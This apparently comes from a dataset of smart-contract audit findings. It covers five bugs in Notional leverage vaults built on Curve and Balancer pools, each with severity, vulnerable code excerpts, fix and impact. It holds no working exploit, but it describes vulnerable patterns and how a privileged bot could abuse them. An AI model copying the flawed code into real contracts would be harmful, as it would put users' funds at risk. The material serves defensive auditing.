Native ETH not received when removing liquidity from Curve V2 pools
high
Native ETH is not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nA Curve V2 pool will always wrap ETH to WETH and send the WETH to the leverage vault unless `use_eth` is explicitly set to `True`; the parameter defaults to `False`. The following implementation of the `remove_liquidity_one_coin` function, taken from one of the Curve V2 pools, shows that unless `use_eth` is set to `True`, `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, "Slippage"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id("transfer(address,uint256)")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. 
Thus, WETH instead of Native ETH will be returned during remove liquidity. As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\n
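The accounting consequence can be sketched with a toy Python model (the names below are hypothetical and only illustrate the mechanism, not the actual contracts): when `use_eth` is left at its default `False`, the vault receives WETH that its Native-ETH-only accounting never sees.

```python
class VaultAccounting:
    """Toy model: the vault only accounts for native ETH (hypothetical names)."""
    def __init__(self):
        self.eth = 0   # native ETH, tracked by the vault
        self.weth = 0  # WETH, invisible to the vault's accounting

def remove_liquidity_one_coin(vault, dy, use_eth=False):
    # Mirrors the Curve V2 branch: native ETH is sent only when use_eth is
    # True; otherwise the pool wraps to WETH and transfers that instead.
    if use_eth:
        vault.eth += dy
    else:
        vault.weth += dy

vault = VaultAccounting()
remove_liquidity_one_coin(vault, 100)            # use_eth left at default False
assert (vault.eth, vault.weth) == (0, 100)       # value arrives, but unaccounted
remove_liquidity_one_coin(vault, 100, use_eth=True)
assert vault.eth == 100                          # explicit use_eth=True is needed
```

The same default applies to `remove_liquidity`, so both exit paths leave WETH stranded unless `use_eth` is passed explicitly.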
If one of the pool tokens is ETH, set the `use_eth` parameter to `True` when calling the `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.
Following are some of the impacts of the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin `redeemFromNotional`, if the vault consists of ETH, `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to send Native ETH, which will fail as Native ETH was not received, and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, the WETH is not re-entered into the pool, as only Native ETH residing in the vault is transferred to the pool. The leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it is converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault, causing the value per share to drop significantly.\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`
```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, "Slippage"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id("transfer(address,uint256)")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n
Single-sided instead of proportional exit is performed during emergency exit
high
Single-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. 
Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\n
Set the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\n
The following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens single-sided incurs unnecessary slippage, as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nIn other words, per the source code comment below, unless a proportional exit is performed, the emergency exit is subject to front-running and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault holds only one of the pool tokens. To re-enter the pool, the vault has to either swap the token for the other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods incur unnecessary slippage, resulting in fewer LP tokens received at the end.
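The slippage asymmetry between a proportional and a single-sided exit can be shown on a toy constant-product (x*y=k) pool; this is illustrative only, since the real Curve and Balancer invariants differ, but the direction of the loss is the same.

```python
# Toy x*y=k pool: equal reserves and a total LP supply (illustrative numbers).
x, y, supply = 1000.0, 1000.0, 1000.0  # reserves and total LP supply
burn = 100.0                           # LP tokens to redeem

# Proportional exit: pro-rata share of both reserves, no trading, no slippage.
out_x, out_y = x * burn / supply, y * burn / supply
assert (out_x, out_y) == (100.0, 100.0)

# Single-sided exit, modelled as a proportional exit followed by swapping
# the out_y leg back into x through the pool (zero-fee constant product).
rx, ry = x - out_x, y - out_y
swap_out = rx - (rx * ry) / (ry + out_y)
single_sided_x = out_x + swap_out
assert single_sided_x == 190.0  # vs. 200 of value with a proportional exit
```

Even with zero fees, the internal swap alone costs 5% of the redemption in this example; the loss grows with the exit size relative to the pool.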
```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n
reinvestReward() generates dust totalPoolClaim causing vault abnormal
medium
If the first user's deposit is too small, rounding down may result in 0 shares, after which every later deposit also mints 0 shares no matter how much is deposited. In `Notional`, this situation is prevented by enforcing `a minimum borrow size and a minimum leverage ratio`. However, `reinvestReward()` does not have this restriction, so the problem can still occur, causing the vault to enter an abnormal state.\\nThe calculation of the vault's shares is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, precision is lost in the conversion to `INTERNAL_TOKEN_PRECISION`, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but since `totalVaultSharesGlobal=0`, `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and they would have none. 
there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account "rolling" a position from one debt maturity to another. in this case, a small excess amount of deposit may come into the vault but the account would still be forced to be holding a sizeable position overall due to the minimum borrow size.\\n`reinvestReward()`, however, has no such limit:\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenario:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. 
However, the withdrawal below executes first:\\nThe users withdraw all deposits, leaving `totalPoolClaim = 0` and `totalVaultSharesGlobal = 0`.\\n`reinvestReward()` then executes, so `totalPoolClaim > 0` while `totalVaultSharesGlobal = 0`.\\nAll subsequent user deposits will fail.\\nIt is recommended that `reinvestReward()` add a check that `totalVaultSharesGlobal > 0`.\\nNote: a malicious REWARD_REINVESTMENT_ROLE could deliberately trigger this issue by donating reward tokens and calling reinvestReward() before the first depositor appears.
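The failure mode follows directly from the integer arithmetic in `_mintVaultShares`; a small Python model of that arithmetic (simplified, hypothetical helper names) makes it concrete:

```python
INTERNAL_TOKEN_PRECISION = 10**8   # vault shares use 8 decimals
POOL_PRECISION = 10**18            # LP tokens use 18 decimals

def mint_vault_shares(lp_tokens, total_pool_claim, total_shares):
    """Mirrors _mintVaultShares' integer division (simplified model)."""
    if total_pool_claim == 0:
        shares = lp_tokens * INTERNAL_TOKEN_PRECISION // POOL_PRECISION
    else:
        shares = lp_tokens * total_shares // total_pool_claim
    return shares, total_pool_claim + lp_tokens, total_shares + shares

# reinvestReward() on an empty vault: totalPoolClaim grows, shares stay zero.
claim, shares_total = 10**15, 0    # dust pool claim from the reinvestment
minted, claim, shares_total = mint_vault_shares(10**18, claim, shares_total)
assert minted == 0                 # lp * 0 // claim == 0
minted, claim, shares_total = mint_vault_shares(10**21, claim, shares_total)
assert minted == 0                 # every later deposit also mints 0 shares
```

Once `totalPoolClaim > 0` with `totalVaultSharesGlobal == 0`, the second branch multiplies by zero forever, which is why the recommended `totalVaultSharesGlobal > 0` check must run before `totalPoolClaim` is increased.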
```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0, "invalid shares");\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n
reinvestReward() generates dust totalPoolClaim causing vault abnormal
```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n
ETH can be sold during reinvestment
medium
The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is 
either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function to sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n
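The bypass is a simple set-membership mismatch, which a toy Python model makes explicit (the placeholder strings below are hypothetical stand-ins, not the deployed addresses):

```python
# Placeholder stand-ins for the addresses involved (hypothetical values).
ALT_ETH = "0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE"
ETH_ADDRESS = "0x0000000000000000000000000000000000000000"
WETH = "<weth address>"

# Curve mixin's blocklist: it names ALT_ETH but neither address(0) nor WETH.
BLOCKED = {"<token1>", "<token2>", "<curve lp token>",
           "<convex reward pool>", "<convex booster>", ALT_ETH}

def is_invalid_reward_token(token):
    return token in BLOCKED

# Trades reference ETH as WETH or address(0), never as ALT_ETH, so the
# check never fires for the forms a trade actually uses:
assert is_invalid_reward_token(ALT_ETH)          # only this form is blocked
assert not is_invalid_reward_token(ETH_ADDRESS)  # slips through
assert not is_invalid_reward_token(WETH)         # slips through
```

The fix is to add every representation of ETH that the trading module accepts to the blocked set, as the recommendation below does.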
To ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n
The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.
```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Leverage Vault on sidechains that support Curve V2 pools is broken
medium
No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitrum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for the Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1 `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. 
As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n """\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. 
Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n """\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP..\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n """\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\n
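The revert path can be sketched with a toy Python model of the pool's token intake (hypothetical names; not the real Vyper code): with `use_eth` left at its default `False`, the pool tries to pull WETH it never received, so forwarding native ETH via the V1 signature always reverts.

```python
class Revert(Exception):
    """Stands in for an EVM revert in this toy model."""

def v2_add_liquidity(msg_value, weth_pulled, use_eth=False):
    # use_eth defaults to False, as in the Curve V2 signature.
    if use_eth:
        if msg_value == 0:
            raise Revert("incorrect eth amount")
    else:
        # With use_eth=False the pool pulls WETH and calls WETH.withdraw(dx);
        # if only native ETH was forwarded, there is no WETH to withdraw.
        if weth_pulled == 0:
            raise Revert("WETH.withdraw: insufficient balance")
    return "lp minted"

# Sidechain vault: IS_CURVE_V2 is False, so the V1 signature is used and
# use_eth is never passed, while native ETH is forwarded as msg.value.
try:
    v2_add_liquidity(msg_value=10**18, weth_pulled=0)
    reverted = False
except Revert:
    reverted = True
assert reverted  # every ETH deposit into such a pool reverts
```

Passing `use_eth=True` (the V2 path) with the same native-ETH transfer succeeds in this model, matching the mainnet behavior of the vault.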
Ensure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism sidechains according to the Curve pool's version.\\nIf there is a limitation on the existing approach to determining whether a pool is V1 or V2 on Arbitrum and Optimism, an alternative approach might be to use the presence of a `gamma()` function as an indicator of the pool type.
No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.
